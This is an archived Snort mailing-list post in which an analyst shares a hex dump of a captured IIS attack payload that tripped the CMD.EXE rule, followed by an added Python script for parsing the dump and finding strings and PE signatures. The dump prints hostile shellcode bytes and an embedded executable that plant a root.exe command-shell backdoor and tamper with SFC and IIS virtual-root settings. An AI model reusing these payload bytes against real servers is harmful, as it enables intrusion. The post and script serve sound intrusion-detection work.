Snort mailing list archives
different CMD.exe access?!?
From: John Hally <JHally () epnet com>
Date: Tue, 11 Mar 2003 10:58:50 -0500
Hello,

This is a different-looking trace that tripped on the CMD.EXE rule. I usually see a bunch of ../../../cmd.exe, but this one looks different. Anyone else seeing this? It originated from 219.240.31.44, over in Korea:

000 : 61 6D 65 00 FF 75 BC FF 55 F8 89 45 98 E8 10 00 ame..u..U..E....
010 : 00 00 57 53 41 47 65 74 4C 61 73 74 45 72 72 6F ..WSAGetLastErro
020 : 72 00 FF 75 BC FF 55 F8 89 45 94 E8 0B 00 00 00 r..u..U..E......
030 : 55 53 45 52 33 32 2E 44 4C 4C 00 FF 55 F4 89 45 USER32.DLL..U..E
040 : 90 E8 0E 00 00 00 45 78 69 74 57 69 6E 64 6F 77 ......ExitWindow
050 : 73 45 78 00 FF 75 90 FF 55 F8 89 45 8C C3 8B 45 sEx..u..U..E...E
060 : 84 69 C0 05 84 08 08 40 89 45 84 8D 84 04 78 56 .i.....@.E....xV
070 : 34 12 F7 D8 C1 C0 08 C3 E8 E1 FF FF FF 3C 00 74 4............<.t
080 : F7 3C FF 74 F3 C3 E8 ED FF FF FF 8A F8 E8 E6 FF .<.t............
090 : FF FF 8A D8 C1 E3 10 E8 DC FF FF FF 8A F8 E8 D5 ................
0a0 : FF FF FF 8A D8 E8 B4 FF FF FF 83 E0 07 E8 20 00 .............. .
0b0 : 00 00 FF FF FF FF 00 FF FF FF 00 FF FF FF 00 FF ................
0c0 : FF FF 00 FF FF FF 00 00 FF FF 00 00 FF FF 00 00 ................
0d0 : FF FF 59 8B 04 81 23 D8 F7 D0 23 85 58 FE FF FF ..Y...#...#.X...
0e0 : 0B D8 80 FB 7F 74 9F 80 FB E0 74 9A 3B 9D 58 FE .....t....t.;.X.
0f0 : FF FF 74 92 C3 68 04 01 00 00 8D 85 5C FE FF FF ..t..h......\...
100 : 50 FF 55 E0 8D BC 05 5C FE FF FF E8 09 00 00 00 P.U....\........
110 : 5C 43 4D 44 2E 45 58 45 00 5E FC A5 A5 A4 B3 63 \CMD.EXE.^.....c
120 : 6A 01 E8 1C 00 00 00 64 3A 5C 69 6E 65 74 70 75 j......d:\inetpu
130 : 62 5C 73 63 72 69 70 74 73 5C 72 6F 6F 74 2E 65 b\scripts\root.e
140 : 78 65 00 8B 0C 24 88 19 8D 85 5C FE FF FF 50 FF xe...$....\...P.
150 : 55 DC 6A 01 E8 2B 00 00 00 64 3A 5C 70 72 6F 67 U.j..+...d:\prog
160 : 72 61 7E 31 5C 63 6F 6D 6D 6F 6E 7E 31 5C 73 79 ra~1\common~1\sy
170 : 73 74 65 6D 5C 4D 53 41 44 43 5C 72 6F 6F 74 2E stem\MSADC\root.
180 : 65 78 65 00 8B 0C 24 88 19 8D 85 5C FE FF FF 50 exe...$....\...P
190 : FF 55 DC E8 BA 05 00 00 FC 4D 5A 50 00 02 00 00 .U.......MZP....
1a0 : 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00 00 00 ................
1b0 : 00 40 00 1A FC 00 00 01 FC FC FC FC FC FC 00 00 .@..............
1c0 : 50 45 00 00 4C 01 03 00 FD 2A 25 29 00 00 00 00 PE..L....*%)....
1d0 : 00 00 00 00 E0 00 8F 81 0B 01 02 19 00 04 00 00 ................
1e0 : 00 08 00 00 00 00 00 00 00 10 00 00 00 10 00 00 ................
1f0 : 00 20 00 00 00 00 40 00 00 10 00 00 00 04 00 00 . ....@.........
200 : 01 00 00 00 00 00 00 00 03 00 0A 00 00 00 00 00 ................
210 : 00 40 00 00 00 04 00 00 00 00 00 00 02 00 00 00 .@..............
220 : 00 00 10 00 00 20 00 00 00 00 10 00 00 10 00 00 ..... ..........
230 : 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ................
240 : 00 30 00 00 0C 01 FC FC FC 00 00 00 00 00 00 00 .0..............
250 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
260 : 00 00 00 00 10 00 00 00 10 00 00 00 04 00 00 00 ................
270 : 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ............... 
280 : 00 00 60 00 00 00 00 00 00 00 00 00 10 00 00 00 ..`.............
290 : 20 00 00 00 04 00 00 00 0C 00 00 00 00 00 00 00  ...............
2a0 : 00 00 00 00 00 00 00 40 00 00 C0 00 00 00 00 00 .......@........
2b0 : 00 00 00 00 10 00 00 00 30 00 00 00 04 00 00 00 ........0.......
2c0 : 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 ...............@
2d0 : 00 00 C0 FC FC FC FC FC FC FC FC FC FC FC FC FC ................
2e0 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
2f0 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC 00 ................
300 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 ...............h
310 : 04 01 00 00 68 D0 20 40 00 E8 61 01 00 00 8D B8 ....h. @..a.....
320 : D0 20 40 00 BE 00 20 40 00 A5 A5 A5 A5 6A 01 68 . @... @.....j.h
330 : D0 20 40 00 E8 4C 01 00 00 E8 0C 00 00 00 68 C0 . @..L........h.
340 : 27 09 00 E8 31 01 00 00 EB EF 68 D8 24 40 00 68 '...1.....h.$@.h
350 : 3F 00 0F 00 6A 00 68 10 20 40 00 68 02 00 00 80 ?...j.h. @.h....
360 : E8 32 01 00 00 0B C0 75 26 6A 04 68 54 20 40 00 .2.....u&j.hT @.
370 : 6A 04 6A 00 68 48 20 40 00 FF 35 D8 24 40 00 E8 j.j.hH @..5.$@..
380 : 0D 01 00 00 FF 35 D8 24 40 00 E8 0E 01 00 00 68 .....5.$@......h
390 : D8 24 40 00 68 3F 00 0F 00 6A 00 68 58 20 40 00 .$@.h?...j.hX @.
3a0 : 68 02 00 00 80 E8 ED 00 00 00 0B C0 75 55 BD 9C h...........uU..
3b0 : 20 40 00 E8 4C 00 00 00 BD A8 20 40 00 E8 42 00  @..L..... @..B.
3c0 : 00 00 6A 09 68 B8 20 40 00 6A 01 6A 00 68 B0 20 ..j.h. @.j.j.h. 
3d0 : 40 00 FF 35 D8 24 40 00 E8 B4 00 00 00 6A 09 68 @..5.$@......j.h
3e0 : C4 20 40 00 6A 01 6A 00 68 B4 20 40 00 FF 35 D8 . @.j.j.h. @..5.
3f0 : 24 40 00 E8 99 00 00 00 FF 35 D8 24 40 00 E8 9A $@.......5.$@...
400 : 00 00 00 C3 C7 05 D0 24 40 00 00 04 00 00 68 D0 .......$@.....h.
410 : 24 40 00 68 D0 20 40 00 68 D4 24 40 00 6A 00 55 $@.h. @.h.$@.j.U
420 : FF 35 D8 24 40 00 E8 60 00 00 00 0B C0 75 49 A1 .5.$@..`.....uI.
430 : D0 24 40 00 0B C0 74 40 BE D0 20 40 00 80 3E 00 .$@...t@.. @..>.
440 : 74 36 46 66 81 7E FE 2C 2C 75 F2 C7 06 32 31 37 t6Ff.~.,,u...217
450 : 00 81 EE CC 20 40 00 89 35 D0 24 40 00 FF 35 D0 .... @..5.$@..5.
460 : 24 40 00 68 D0 20 40 00 6A 01 6A 00 55 FF 35 D8 $@.h. @.j.j.U.5.
470 : 24 40 00 E8 19 00 00 00 C3 FF 25 60 30 40 00 FF $@........%`0@..
480 : 25 64 30 40 00 FF 25 68 30 40 00 FF 25 70 30 40 %d0@..%h0@..%p0@
490 : 00 FF 25 74 30 40 00 FF 25 78 30 40 00 FF 25 7C ..%t0@..%x0@..%|
4a0 : 30 40 FC FC FC FC FC FC FC FC FC FC FC FC FC FC 0@..............
4b0 : FC FC FC FC FC 00 00 00 00 00 00 00 00 00 00 00 ................
4c0 : 00 00 5C 45 58 50 4C 4F 52 45 52 2E 45 58 45 00 ..\EXPLORER.EXE.
4d0 : 00 00 53 4F 46 54 57 41 52 45 5C 4D 69 63 72 6F ..SOFTWARE\Micro
4e0 : 73 6F 66 74 5C 57 69 6E 64 6F 77 73 20 4E 54 5C soft\Windows NT\
4f0 : 43 75 72 72 65 6E 74 56 65 72 73 69 6F 6E 5C 57 CurrentVersion\W
500 : 69 6E 6C 6F 67 6F 6E 00 00 00 53 46 43 44 69 73 inlogon...SFCDis
510 : 61 62 6C 65 00 00 9D FF FF FF 53 59 53 54 45 4D able......SYSTEM
520 : 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 \CurrentControlS
530 : 65 74 5C 53 65 72 76 69 63 65 73 5C 57 33 53 56 et\Services\W3SV
540 : 43 5C 50 61 72 61 6D 65 74 65 72 73 5C 56 69 72 C\Parameters\Vir
550 : 74 75 61 6C 20 52 6F 6F tual Roo
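The trace above is in Snort's payload-dump format (hex offset, up to 16 bytes, then a printable column). When a content rule such as the CMD.EXE one fires on a payload like this, the first triage question is what in the bytes actually satisfied the match and what else is riding along with it. The following Python is an added example, not code from the original post or from Snort: it rebuilds the payload bytes from dump lines, pulls out the printable strings, locates the MZ and PE\0\0 signatures, and reports where a case-insensitive cmd.exe content match would hit. The embedded sample is a handful of rows excerpted from the dump above (offsets 0x110 to 0x140, 0x190 and 0x1c0); rows not listed are zero-filled by the parser. Function and variable names are mine.

```python
import re

# Rows excerpted from the Snort payload dump in the post above. Offsets that are
# not listed here (0x000-0x10f, 0x150-0x18f, 0x1a0-0x1bf) are zero-filled when
# the buffer is rebuilt, so strings never run across the gaps.
SAMPLE_DUMP = r"""
110 : 5C 43 4D 44 2E 45 58 45 00 5E FC A5 A5 A4 B3 63 \CMD.EXE.^.....c
120 : 6A 01 E8 1C 00 00 00 64 3A 5C 69 6E 65 74 70 75 j......d:\inetpu
130 : 62 5C 73 63 72 69 70 74 73 5C 72 6F 6F 74 2E 65 b\scripts\root.e
140 : 78 65 00 8B 0C 24 88 19 8D 85 5C FE FF FF 50 FF xe...$....\...P.
190 : FF 55 DC E8 BA 05 00 00 FC 4D 5A 50 00 02 00 00 .U.......MZP....
1c0 : 50 45 00 00 4C 01 03 00 FD 2A 25 29 00 00 00 00 PE..L....*%)....
"""

ROW_RE = re.compile(r"^\s*([0-9A-Fa-f]+)\s*:\s*(.*)$")   # "OFF : <bytes> <printable>"
HEX_RE = re.compile(r"^[0-9A-Fa-f]{2}$")


def parse_snort_dump(text):
    """Rebuild payload bytes from Snort dump rows; unlisted offsets are zero-filled."""
    chunks = {}
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue                      # blank line or surrounding prose
        offset = int(m.group(1), 16)
        data = bytearray()
        for tok in m.group(2).split():
            # A row holds at most 16 bytes; the first non-hex token begins the
            # printable column. Caveat: in a short final row whose printable
            # column happens to start with two hex digits and a space, that
            # token would be mis-read as a byte, so validate short rows by eye.
            if len(data) == 16 or not HEX_RE.match(tok):
                break
            data.append(int(tok, 16))
        chunks[offset] = bytes(data)
    if not chunks:
        return b""
    end = max(off + len(d) for off, d in chunks.items())
    buf = bytearray(end)
    for off, d in chunks.items():
        buf[off:off + len(d)] = d
    return bytes(buf)


def extract_strings(buf, min_len=4):
    """Return (offset, text) for every run of printable ASCII of at least min_len bytes."""
    found, start = [], None
    for i, b in enumerate(buf):
        if 0x20 <= b < 0x7F:
            if start is None:
                start = i
        else:
            if start is not None and i - start >= min_len:
                found.append((start, buf[start:i].decode("ascii")))
            start = None
    if start is not None and len(buf) - start >= min_len:
        found.append((start, buf[start:].decode("ascii")))
    return found


def find_pe_markers(buf):
    """Offsets of the first 'MZ' and 'PE\\0\\0' signatures (None when absent)."""
    mz = buf.find(b"MZ")
    pe = buf.find(b"PE\x00\x00")
    return {"MZ": mz if mz >= 0 else None, "PE": pe if pe >= 0 else None}


def cmd_exe_match_offset(buf):
    """Offset a case-insensitive content match on 'cmd.exe' would report, or -1."""
    return buf.lower().find(b"cmd.exe")


if __name__ == "__main__":
    payload = parse_snort_dump(SAMPLE_DUMP)
    print("cmd.exe content match at: 0x%x" % cmd_exe_match_offset(payload))
    for off, s in extract_strings(payload):
        print("0x%04x  %s" % (off, s))
    print("PE markers:", {k: (hex(v) if v is not None else None)
                           for k, v in find_pe_markers(payload).items()})
```

On the excerpt, the content match lands on the `\CMD.EXE` string at 0x110, two embedded paths (`\CMD.EXE`, `d:\inetpub\scripts\root.exe`) come out as strings, and the `MZ` signature at 0x199 is followed by a `PE\0\0` signature at 0x1c0, i.e. the payload carries an executable image after the string-building code, which is why this looks nothing like a plain `../../../cmd.exe` URI probe.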
Current thread:
- different CMD.exe access?!? John Hally (Mar 11)
- Re: different CMD.exe access?!? Bamm Visscher (Mar 11)
- Re: different CMD.exe access?!? Jason (Mar 14)
- Re: different CMD.exe access?!? Phil Wood (Mar 11)
- Re: different CMD.exe access?!? Paul Schmehl (Mar 11)
- <Possible follow-ups>
- RE: different CMD.exe access?!? L. Christopher Luther (Mar 11)
- RE: different CMD.exe access?!? Ricardo, Gerson (Mar 14)
- Re: different CMD.exe access?!? Bamm Visscher (Mar 11)